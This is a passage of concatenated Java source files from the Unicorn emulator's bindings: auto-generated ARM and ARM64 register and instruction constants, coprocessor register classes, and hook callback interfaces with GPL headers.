UC_ARM64_REG_Q1 = 105; public static final int UC_ARM64_REG_Q2 = 106; public static final int UC_ARM64_REG_Q3 = 107; public static final int UC_ARM64_REG_Q4 = 108; public static final int UC_ARM64_REG_Q5 = 109; public static final int UC_ARM64_REG_Q6 = 110; public static final int UC_ARM64_REG_Q7 = 111; public static final int UC_ARM64_REG_Q8 = 112; public static final int UC_ARM64_REG_Q9 = 113; public static final int UC_ARM64_REG_Q10 = 114; public static final int UC_ARM64_REG_Q11 = 115; public static final int UC_ARM64_REG_Q12 = 116; public static final int UC_ARM64_REG_Q13 = 117; public static final int UC_ARM64_REG_Q14 = 118; public static final int UC_ARM64_REG_Q15 = 119; public static final int UC_ARM64_REG_Q16 = 120; public static final int UC_ARM64_REG_Q17 = 121; public static final int UC_ARM64_REG_Q18 = 122; public static final int UC_ARM64_REG_Q19 = 123; public static final int UC_ARM64_REG_Q20 = 124; public static final int UC_ARM64_REG_Q21 = 125; public static final int UC_ARM64_REG_Q22 = 126; public static final int UC_ARM64_REG_Q23 = 127; public static final int UC_ARM64_REG_Q24 = 128; public static final int UC_ARM64_REG_Q25 = 129; public static final int UC_ARM64_REG_Q26 = 130; public static final int UC_ARM64_REG_Q27 = 131; public static final int UC_ARM64_REG_Q28 = 132; public static final int UC_ARM64_REG_Q29 = 133; public static final int UC_ARM64_REG_Q30 = 134; public static final int UC_ARM64_REG_Q31 = 135; public static final int UC_ARM64_REG_S0 = 136; public static final int UC_ARM64_REG_S1 = 137; public static final int UC_ARM64_REG_S2 = 138; public static final int UC_ARM64_REG_S3 = 139; public static final int UC_ARM64_REG_S4 = 140; public static final int UC_ARM64_REG_S5 = 141; public static final int UC_ARM64_REG_S6 = 142; public static final int UC_ARM64_REG_S7 = 143; public static final int UC_ARM64_REG_S8 = 144; public static final int UC_ARM64_REG_S9 = 145; public static final int UC_ARM64_REG_S10 = 146; public static final int UC_ARM64_REG_S11 = 147; public static final int UC_ARM64_REG_S12 = 148; public static final int UC_ARM64_REG_S13 = 149; public static final int UC_ARM64_REG_S14 = 150; public static final int UC_ARM64_REG_S15 = 151; public static final int UC_ARM64_REG_S16 = 152; public static final int UC_ARM64_REG_S17 = 153; public static final int UC_ARM64_REG_S18 = 154; public static final int UC_ARM64_REG_S19 = 155; public static final int UC_ARM64_REG_S20 = 156; public static final int UC_ARM64_REG_S21 = 157; public static final int UC_ARM64_REG_S22 = 158; public static final int UC_ARM64_REG_S23 = 159; public static final int UC_ARM64_REG_S24 = 160; public static final int UC_ARM64_REG_S25 = 161; public static final int UC_ARM64_REG_S26 = 162; public static final int UC_ARM64_REG_S27 = 163; public static final int UC_ARM64_REG_S28 = 164; public static final int UC_ARM64_REG_S29 = 165; public static final int UC_ARM64_REG_S30 = 166; public static final int UC_ARM64_REG_S31 = 167; public static final int UC_ARM64_REG_W0 = 168; public static final int UC_ARM64_REG_W1 = 169; public static final int UC_ARM64_REG_W2 = 170; public static final int UC_ARM64_REG_W3 = 171; public static final int UC_ARM64_REG_W4 = 172; public static final int UC_ARM64_REG_W5 = 173; public static final int UC_ARM64_REG_W6 = 174; public static final int UC_ARM64_REG_W7 = 175; public static final int UC_ARM64_REG_W8 = 176; public static final int UC_ARM64_REG_W9 = 177; public static final int UC_ARM64_REG_W10 = 178; public static final int UC_ARM64_REG_W11 = 179; public static final int UC_ARM64_REG_W12 = 180; public static final int UC_ARM64_REG_W13 = 181; public static final int UC_ARM64_REG_W14 = 182; public static final int UC_ARM64_REG_W15 = 183; public static final int UC_ARM64_REG_W16 = 184; public static final int UC_ARM64_REG_W17 = 185; public static final int UC_ARM64_REG_W18 = 186; public static final int UC_ARM64_REG_W19 = 187; public static final int UC_ARM64_REG_W20 = 188; public static final int UC_ARM64_REG_W21 = 189; public static final int UC_ARM64_REG_W22 = 190; public static final int UC_ARM64_REG_W23 = 191; public static final int UC_ARM64_REG_W24 = 192; public static final int UC_ARM64_REG_W25 = 193; public static final int UC_ARM64_REG_W26 = 194; public static final int UC_ARM64_REG_W27 = 195; public static final int UC_ARM64_REG_W28 = 196; public static final int UC_ARM64_REG_W29 = 197; public static final int UC_ARM64_REG_W30 = 198; public static final int UC_ARM64_REG_X0 = 199; public static final int UC_ARM64_REG_X1 = 200; public static final int UC_ARM64_REG_X2 = 201; public static final int UC_ARM64_REG_X3 = 202; public static final int UC_ARM64_REG_X4 = 203; public static final int UC_ARM64_REG_X5 = 204; public static final int UC_ARM64_REG_X6 = 205; public static final int UC_ARM64_REG_X7 = 206; public static final int UC_ARM64_REG_X8 = 207; public static final int UC_ARM64_REG_X9 = 208; public static final int UC_ARM64_REG_X10 = 209; public static final int UC_ARM64_REG_X11 = 210; public static final int UC_ARM64_REG_X12 = 211; public static final int UC_ARM64_REG_X13 = 212; public static final int UC_ARM64_REG_X14 = 213; public static final int UC_ARM64_REG_X15 = 214; public static final int UC_ARM64_REG_X16 = 215; public static final int UC_ARM64_REG_X17 = 216; public static final int UC_ARM64_REG_X18 = 217; public static final int UC_ARM64_REG_X19 = 218; public static final int UC_ARM64_REG_X20 = 219; public static final int UC_ARM64_REG_X21 = 220; public static final int UC_ARM64_REG_X22 = 221; public static final int UC_ARM64_REG_X23 = 222; public static final int UC_ARM64_REG_X24 = 223; public static final int UC_ARM64_REG_X25 = 224; public static final int UC_ARM64_REG_X26 = 225; public static final int UC_ARM64_REG_X27 = 226; public static final int UC_ARM64_REG_X28 = 227; public static final int UC_ARM64_REG_V0 = 228; public static final int UC_ARM64_REG_V1 = 229; public static final int UC_ARM64_REG_V2 = 230; public static final int UC_ARM64_REG_V3 = 231; public static final int UC_ARM64_REG_V4 = 232; public static final int UC_ARM64_REG_V5 = 233; public static final int UC_ARM64_REG_V6 = 234; public static final int UC_ARM64_REG_V7 = 235; public static final int UC_ARM64_REG_V8 = 236; public static final int UC_ARM64_REG_V9 = 237; public static final int UC_ARM64_REG_V10 = 238; public static final int UC_ARM64_REG_V11 = 239; public static final int UC_ARM64_REG_V12 = 240; public static final int UC_ARM64_REG_V13 = 241; public static final int UC_ARM64_REG_V14 = 242; public static final int UC_ARM64_REG_V15 = 243; public static final int UC_ARM64_REG_V16 = 244; public static final int UC_ARM64_REG_V17 = 245; public static final int UC_ARM64_REG_V18 = 246; public static final int UC_ARM64_REG_V19 = 247; public static final int UC_ARM64_REG_V20 = 248; public static final int UC_ARM64_REG_V21 = 249; public static final int UC_ARM64_REG_V22 = 250; public static final int UC_ARM64_REG_V23 = 251; public static final int UC_ARM64_REG_V24 = 252; public static final int UC_ARM64_REG_V25 = 253; public static final int UC_ARM64_REG_V26 = 254; public static final int UC_ARM64_REG_V27 = 255; public static final int UC_ARM64_REG_V28 = 256; public static final int UC_ARM64_REG_V29 = 257; public static final int UC_ARM64_REG_V30 = 258; public static final int UC_ARM64_REG_V31 = 259; // pseudo registers public static final int UC_ARM64_REG_PC = 260; public static final int UC_ARM64_REG_CPACR_EL1 = 261; // thread registers, depreciated, use UC_ARM64_REG_CP_REG instead public static final int UC_ARM64_REG_TPIDR_EL0 = 262; public static final int UC_ARM64_REG_TPIDRRO_EL0 = 263; public static final int UC_ARM64_REG_TPIDR_EL1 = 264; public static final int UC_ARM64_REG_PSTATE = 265; // exception link registers, depreciated, use UC_ARM64_REG_CP_REG instead public static final int UC_ARM64_REG_ELR_EL0 = 266; public static final int UC_ARM64_REG_ELR_EL1 = 267; public static final int UC_ARM64_REG_ELR_EL2 = 268; public static final int UC_ARM64_REG_ELR_EL3 = 269; // stack pointers registers, depreciated, use UC_ARM64_REG_CP_REG instead public static final int UC_ARM64_REG_SP_EL0 = 270; public static final int UC_ARM64_REG_SP_EL1 = 271; public static final int UC_ARM64_REG_SP_EL2 = 272; public static final int UC_ARM64_REG_SP_EL3 = 273; // other CP15 registers, depreciated, use UC_ARM64_REG_CP_REG instead public static final int UC_ARM64_REG_TTBR0_EL1 = 274; public static final int UC_ARM64_REG_TTBR1_EL1 = 275; public static final int UC_ARM64_REG_ESR_EL0 = 276; public static final int UC_ARM64_REG_ESR_EL1 = 277; public static final int UC_ARM64_REG_ESR_EL2 = 278; public static final int UC_ARM64_REG_ESR_EL3 = 279; public static final int UC_ARM64_REG_FAR_EL0 = 280; public static final int UC_ARM64_REG_FAR_EL1 = 281; public static final int UC_ARM64_REG_FAR_EL2 = 282; public static final int UC_ARM64_REG_FAR_EL3 = 283; public static final int UC_ARM64_REG_PAR_EL1 = 284; public static final int UC_ARM64_REG_MAIR_EL1 = 285; public static final int UC_ARM64_REG_VBAR_EL0 = 286; public static final int UC_ARM64_REG_VBAR_EL1 = 287; public static final int UC_ARM64_REG_VBAR_EL2 = 288; public static final int UC_ARM64_REG_VBAR_EL3 = 289; public static final int UC_ARM64_REG_CP_REG = 290; // floating point control and status registers public static final int UC_ARM64_REG_FPCR = 291; public static final int UC_ARM64_REG_FPSR = 292; public static final int UC_ARM64_REG_ENDING = 293; // alias registers public static final int UC_ARM64_REG_IP0 = 215; public static final int UC_ARM64_REG_IP1 = 216; public static final int UC_ARM64_REG_FP = 1; public static final int UC_ARM64_REG_LR = 2; // ARM64 instructions public static final int UC_ARM64_INS_INVALID = 0; public static final int UC_ARM64_INS_MRS = 1; public static final int UC_ARM64_INS_MSR = 2; public static final int UC_ARM64_INS_SYS = 3; public static final int UC_ARM64_INS_SYSL = 4; public static final int UC_ARM64_INS_ENDING = 5; } unicorn-2.1.1/bindings/java/src/main/java/unicorn/Arm64SysHook.java000066400000000000000000000030611467524106700251070ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Callback for {@code UC_HOOK_INSN} with {@code UC_ARM64_INS_MRS}, * {@code UC_ARM64_INS_MSR}, {@code UC_ARM64_INS_SYS} * or {@code UC_ARM64_INS_SYSL} */ public interface Arm64SysHook extends InstructionHook { /** Called to handle an AArch64 MRS, MSR, SYS or SYSL instruction. * * @param u {@link Unicorn} instance firing this hook * @param reg source or destination register * ({@code UC_ARM64_REG_X*} constant) * @param cp_reg coprocessor register specification * ({@code .val} = current value of {@code reg}) * @param user user data provided when registering this hook * @return 1 to skip the instruction (marking it as handled), * 0 to let QEMU handle it */ public int hook(Unicorn u, int reg, Arm64_CP cp_reg, Object user); } unicorn-2.1.1/bindings/java/src/main/java/unicorn/Arm64_CP.java000066400000000000000000000026161467524106700241560ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** ARM64 coprocessor registers for instructions MRS, MSR, SYS, SYSL */ public class Arm64_CP { public int crn, crm, op0, op1, op2; public long val; public Arm64_CP(int crn, int crm, int op0, int op1, int op2) { this(crn, crm, op0, op1, op2, 0); } public Arm64_CP(int crn, int crm, int op0, int op1, int op2, long val) { this.crn = crn; this.crm = crm; this.op0 = op0; this.op1 = op1; this.op2 = op2; this.val = val; } @Override public String toString() { return "Arm64_CP [crn=" + crn + ", crm=" + crm + ", op0=" + op0 + ", op1=" + op1 + ", op2=" + op2 + ", val=" + val + "]"; } } unicorn-2.1.1/bindings/java/src/main/java/unicorn/ArmConst.java000066400000000000000000000223241467524106700244270ustar00rootroot00000000000000// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT package unicorn; public interface ArmConst { // ARM CPU public static final int UC_CPU_ARM_926 = 0; public static final int UC_CPU_ARM_946 = 1; public static final int UC_CPU_ARM_1026 = 2; public static final int UC_CPU_ARM_1136_R2 = 3; public static final int UC_CPU_ARM_1136 = 4; public static final int UC_CPU_ARM_1176 = 5; public static final int UC_CPU_ARM_11MPCORE = 6; public static final int UC_CPU_ARM_CORTEX_M0 = 7; public static final int UC_CPU_ARM_CORTEX_M3 = 8; public static final int UC_CPU_ARM_CORTEX_M4 = 9; public static final int UC_CPU_ARM_CORTEX_M7 = 10; public static final int UC_CPU_ARM_CORTEX_M33 = 11; public static final int UC_CPU_ARM_CORTEX_R5 = 12; public static final int UC_CPU_ARM_CORTEX_R5F = 13; public static final int UC_CPU_ARM_CORTEX_A7 = 14; public static final int UC_CPU_ARM_CORTEX_A8 = 15; public static final int UC_CPU_ARM_CORTEX_A9 = 16; public static final int UC_CPU_ARM_CORTEX_A15 = 17; public static final int UC_CPU_ARM_TI925T = 18; public static final int UC_CPU_ARM_SA1100 = 19; public static final int UC_CPU_ARM_SA1110 = 20; public static final int UC_CPU_ARM_PXA250 = 21; public static final int UC_CPU_ARM_PXA255 = 22; public static final int UC_CPU_ARM_PXA260 = 23; public static final int UC_CPU_ARM_PXA261 = 24; public static final int UC_CPU_ARM_PXA262 = 25; public static final int UC_CPU_ARM_PXA270 = 26; public static final int UC_CPU_ARM_PXA270A0 = 27; public static final int UC_CPU_ARM_PXA270A1 = 28; public static final int UC_CPU_ARM_PXA270B0 = 29; public static final int UC_CPU_ARM_PXA270B1 = 30; public static final int UC_CPU_ARM_PXA270C0 = 31; public static final int UC_CPU_ARM_PXA270C5 = 32; public static final int UC_CPU_ARM_MAX = 33; public static final int UC_CPU_ARM_ENDING = 34; // ARM registers public static final int UC_ARM_REG_INVALID = 0; public static final int UC_ARM_REG_APSR = 1; public static final int UC_ARM_REG_APSR_NZCV = 2; public static final int UC_ARM_REG_CPSR = 3; public static final int UC_ARM_REG_FPEXC = 4; public static final int UC_ARM_REG_FPINST = 5; public static final int UC_ARM_REG_FPSCR = 6; public static final int UC_ARM_REG_FPSCR_NZCV = 7; public static final int UC_ARM_REG_FPSID = 8; public static final int UC_ARM_REG_ITSTATE = 9; public static final int UC_ARM_REG_LR = 10; public static final int UC_ARM_REG_PC = 11; public static final int UC_ARM_REG_SP = 12; public static final int UC_ARM_REG_SPSR = 13; public static final int UC_ARM_REG_D0 = 14; public static final int UC_ARM_REG_D1 = 15; public static final int UC_ARM_REG_D2 = 16; public static final int UC_ARM_REG_D3 = 17; public static final int UC_ARM_REG_D4 = 18; public static final int UC_ARM_REG_D5 = 19; public static final int UC_ARM_REG_D6 = 20; public static final int UC_ARM_REG_D7 = 21; public static final int UC_ARM_REG_D8 = 22; public static final int UC_ARM_REG_D9 = 23; public static final int UC_ARM_REG_D10 = 24; public static final int UC_ARM_REG_D11 = 25; public static final int UC_ARM_REG_D12 = 26; public static final int UC_ARM_REG_D13 = 27; public static final int UC_ARM_REG_D14 = 28; public static final int UC_ARM_REG_D15 = 29; public static final int UC_ARM_REG_D16 = 30; public static final int UC_ARM_REG_D17 = 31; public static final int UC_ARM_REG_D18 = 32; public static final int UC_ARM_REG_D19 = 33; public static final int UC_ARM_REG_D20 = 34; public static final int UC_ARM_REG_D21 = 35; public static final int UC_ARM_REG_D22 = 36; public static final int UC_ARM_REG_D23 = 37; public static final int UC_ARM_REG_D24 = 38; public static final int UC_ARM_REG_D25 = 39; public static final int UC_ARM_REG_D26 = 40; public static final int UC_ARM_REG_D27 = 41; public static final int UC_ARM_REG_D28 = 42; public static final int UC_ARM_REG_D29 = 43; public static final int UC_ARM_REG_D30 = 44; public static final int UC_ARM_REG_D31 = 45; public static final int UC_ARM_REG_FPINST2 = 46; public static final int UC_ARM_REG_MVFR0 = 47; public static final int UC_ARM_REG_MVFR1 = 48; public static final int UC_ARM_REG_MVFR2 = 49; public static final int UC_ARM_REG_Q0 = 50; public static final int UC_ARM_REG_Q1 = 51; public static final int UC_ARM_REG_Q2 = 52; public static final int UC_ARM_REG_Q3 = 53; public static final int UC_ARM_REG_Q4 = 54; public static final int UC_ARM_REG_Q5 = 55; public static final int UC_ARM_REG_Q6 = 56; public static final int UC_ARM_REG_Q7 = 57; public static final int UC_ARM_REG_Q8 = 58; public static final int UC_ARM_REG_Q9 = 59; public static final int UC_ARM_REG_Q10 = 60; public static final int UC_ARM_REG_Q11 = 61; public static final int UC_ARM_REG_Q12 = 62; public static final int UC_ARM_REG_Q13 = 63; public static final int UC_ARM_REG_Q14 = 64; public static final int UC_ARM_REG_Q15 = 65; public static final int UC_ARM_REG_R0 = 66; public static final int UC_ARM_REG_R1 = 67; public static final int UC_ARM_REG_R2 = 68; public static final int UC_ARM_REG_R3 = 69; public static final int UC_ARM_REG_R4 = 70; public static final int UC_ARM_REG_R5 = 71; public static final int UC_ARM_REG_R6 = 72; public static final int UC_ARM_REG_R7 = 73; public static final int UC_ARM_REG_R8 = 74; public static final int UC_ARM_REG_R9 = 75; public static final int UC_ARM_REG_R10 = 76; public static final int UC_ARM_REG_R11 = 77; public static final int UC_ARM_REG_R12 = 78; public static final int UC_ARM_REG_S0 = 79; public static final int UC_ARM_REG_S1 = 80; public static final int UC_ARM_REG_S2 = 81; public static final int UC_ARM_REG_S3 = 82; public static final int UC_ARM_REG_S4 = 83; public static final int UC_ARM_REG_S5 = 84; public static final int UC_ARM_REG_S6 = 85; public static final int UC_ARM_REG_S7 = 86; public static final int UC_ARM_REG_S8 = 87; public static final int UC_ARM_REG_S9 = 88; public static final int UC_ARM_REG_S10 = 89; public static final int UC_ARM_REG_S11 = 90; public static final int UC_ARM_REG_S12 = 91; public static final int UC_ARM_REG_S13 = 92; public static final int UC_ARM_REG_S14 = 93; public static final int UC_ARM_REG_S15 = 94; public static final int UC_ARM_REG_S16 = 95; public static final int UC_ARM_REG_S17 = 96; public static final int UC_ARM_REG_S18 = 97; public static final int UC_ARM_REG_S19 = 98; public static final int UC_ARM_REG_S20 = 99; public static final int UC_ARM_REG_S21 = 100; public static final int UC_ARM_REG_S22 = 101; public static final int UC_ARM_REG_S23 = 102; public static final int UC_ARM_REG_S24 = 103; public static final int UC_ARM_REG_S25 = 104; public static final int UC_ARM_REG_S26 = 105; public static final int UC_ARM_REG_S27 = 106; public static final int UC_ARM_REG_S28 = 107; public static final int UC_ARM_REG_S29 = 108; public static final int UC_ARM_REG_S30 = 109; public static final int UC_ARM_REG_S31 = 110; public static final int UC_ARM_REG_C1_C0_2 = 111; public static final int UC_ARM_REG_C13_C0_2 = 112; public static final int UC_ARM_REG_C13_C0_3 = 113; public static final int UC_ARM_REG_IPSR = 114; public static final int UC_ARM_REG_MSP = 115; public static final int UC_ARM_REG_PSP = 116; public static final int UC_ARM_REG_CONTROL = 117; public static final int UC_ARM_REG_IAPSR = 118; public static final int UC_ARM_REG_EAPSR = 119; public static final int UC_ARM_REG_XPSR = 120; public static final int UC_ARM_REG_EPSR = 121; public static final int UC_ARM_REG_IEPSR = 122; public static final int UC_ARM_REG_PRIMASK = 123; public static final int UC_ARM_REG_BASEPRI = 124; public static final int UC_ARM_REG_BASEPRI_MAX = 125; public static final int UC_ARM_REG_FAULTMASK = 126; public static final int UC_ARM_REG_APSR_NZCVQ = 127; public static final int UC_ARM_REG_APSR_G = 128; public static final int UC_ARM_REG_APSR_NZCVQG = 129; public static final int UC_ARM_REG_IAPSR_NZCVQ = 130; public static final int UC_ARM_REG_IAPSR_G = 131; public static final int UC_ARM_REG_IAPSR_NZCVQG = 132; public static final int UC_ARM_REG_EAPSR_NZCVQ = 133; public static final int UC_ARM_REG_EAPSR_G = 134; public static final int UC_ARM_REG_EAPSR_NZCVQG = 135; public static final int UC_ARM_REG_XPSR_NZCVQ = 136; public static final int UC_ARM_REG_XPSR_G = 137; public static final int UC_ARM_REG_XPSR_NZCVQG = 138; public static final int UC_ARM_REG_CP_REG = 139; public static final int UC_ARM_REG_ENDING = 140; // alias registers public static final int UC_ARM_REG_R13 = 12; public static final int UC_ARM_REG_R14 = 10; public static final int UC_ARM_REG_R15 = 11; public static final int UC_ARM_REG_SB = 75; public static final int UC_ARM_REG_SL = 76; public static final int UC_ARM_REG_FP = 77; public static final int UC_ARM_REG_IP = 78; } unicorn-2.1.1/bindings/java/src/main/java/unicorn/Arm_CP.java000066400000000000000000000015621467524106700240030ustar00rootroot00000000000000package unicorn; /** ARM coprocessor register for MRC, MCR, MRRC, MCRR */ public class Arm_CP { public int cp, is64, sec, crn, crm, opc1, opc2; public long val; public Arm_CP(int cp, int is64, int sec, int crn, int crm, int opc1, int opc2) { this(cp, is64, sec, crn, crm, opc1, opc2, 0); } public Arm_CP(int cp, int is64, int sec, int crn, int crm, int opc1, int opc2, long val) { this.cp = cp; this.is64 = is64; this.sec = sec; this.crn = crn; this.crm = crm; this.opc1 = opc1; this.opc2 = opc2; this.val = val; } @Override public String toString() { return "Arm_CP [cp=" + cp + ", is64=" + is64 + ", sec=" + sec + ", crn=" + crn + ", crm=" + crm + ", opc1=" + opc1 + ", opc2=" + opc2 + ", val=" + val + "]"; } } unicorn-2.1.1/bindings/java/src/main/java/unicorn/BlockHook.java000066400000000000000000000022671467524106700245600ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Callback for {@code UC_HOOK_BLOCK} */ public interface BlockHook extends Hook { /** Called on each basic block within the hooked range. * * @param u {@link Unicorn} instance firing this hook * @param address address of the first instruction in the block * @param size size of the block, in bytes * @param user user data provided when registering this hook */ public void hook(Unicorn u, long address, int size, Object user); } unicorn-2.1.1/bindings/java/src/main/java/unicorn/CodeHook.java000066400000000000000000000022501467524106700243700ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Callback for {@code UC_HOOK_CODE} */ public interface CodeHook extends Hook { /** Called on each instruction within the hooked range. * * @param u {@link Unicorn} instance firing this hook * @param address address of the instruction * @param size size of the instruction, in bytes * @param user user data provided when registering this hook */ public void hook(Unicorn u, long address, int size, Object user); } unicorn-2.1.1/bindings/java/src/main/java/unicorn/CpuidHook.java000066400000000000000000000022761467524106700245720ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Callback for {@code UC_HOOK_INSN} with {@code UC_X86_INS_CPUID} */ public interface CpuidHook extends InstructionHook { /** Called to handle an x86 CPUID instruction. * * @param u {@link Unicorn} instance firing this hook * @param user user data provided when registering this hook * @return 1 to skip the instruction (marking it as handled), * 0 to let QEMU handle it */ public int hook(Unicorn u, Object user); } unicorn-2.1.1/bindings/java/src/main/java/unicorn/EdgeGeneratedHook.java000066400000000000000000000023661467524106700262110ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Callback for {@code UC_HOOK_EDGE_GENERATED} */ public interface EdgeGeneratedHook extends Hook { /** Called whenever a jump is made to a new (untranslated) basic block. * * @param u {@link Unicorn} instance firing this hook * @param cur_tb newly translated block being entered * @param prev_tb previous block being exited * @param user user data provided when registering this hook */ public void hook(Unicorn u, TranslationBlock cur_tb, TranslationBlock prev_tb, Object user); } unicorn-2.1.1/bindings/java/src/main/java/unicorn/EventMemHook.java000066400000000000000000000034201467524106700252360ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Callback for {@code UC_HOOK_MEM_INVALID} * (UC_HOOK_MEM_{READ,WRITE,FETCH}_{UNMAPPED,PROT}) */ public interface EventMemHook extends Hook { /** Called when an invalid memory access occurs within the registered * range. * * @param u {@link Unicorn} instance firing this hook * @param type type of the memory access and violation: one of * UC_MEM_{READ,WRITE,FETCH}_{UNMAPPED,PROT} * @param address address of the memory access * @param size size of the memory access * @param value value written ({@code UC_MEM_WRITE_*} only) * @param user user data provided when registering this hook * @return {@code true} to mark the exception as handled, which * will retry the memory access. If no hooks return * {@code true}, the memory access will fail and a CPU * exception will be raised. */ public boolean hook(Unicorn u, int type, long address, int size, long value, Object user); } unicorn-2.1.1/bindings/java/src/main/java/unicorn/Hook.java000066400000000000000000000014341467524106700236000ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Base interface for all Unicorn hooks */ public interface Hook { } unicorn-2.1.1/bindings/java/src/main/java/unicorn/InHook.java000066400000000000000000000023441467524106700240700ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Callback for {@code UC_HOOK_INSN} with {@code UC_X86_INS_IN} */ public interface InHook extends InstructionHook { /** Called to handle an x86 IN instruction. * * @param u {@link Unicorn} instance firing this hook * @param port I/O port number * @param size size of the request (1, 2, or 4 bytes) * @param user user data provided when registering this hook * @return value of the I/O request */ public int hook(Unicorn u, int port, int size, Object user); } unicorn-2.1.1/bindings/java/src/main/java/unicorn/InstructionHook.java000066400000000000000000000014751467524106700260470ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Base interface for {@code UC_HOOK_INSN} hooks */ public interface InstructionHook extends Hook { } unicorn-2.1.1/bindings/java/src/main/java/unicorn/InterruptHook.java000066400000000000000000000021331467524106700255120ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Callback for {@code UC_HOOK_INTR} */ public interface InterruptHook extends Hook { /** Called when a CPU interrupt occurs. * * @param u {@link Unicorn} instance firing this hook * @param intno CPU-specific interrupt number * @param user user data provided when registering this hook */ public void hook(Unicorn u, int intno, Object user); } 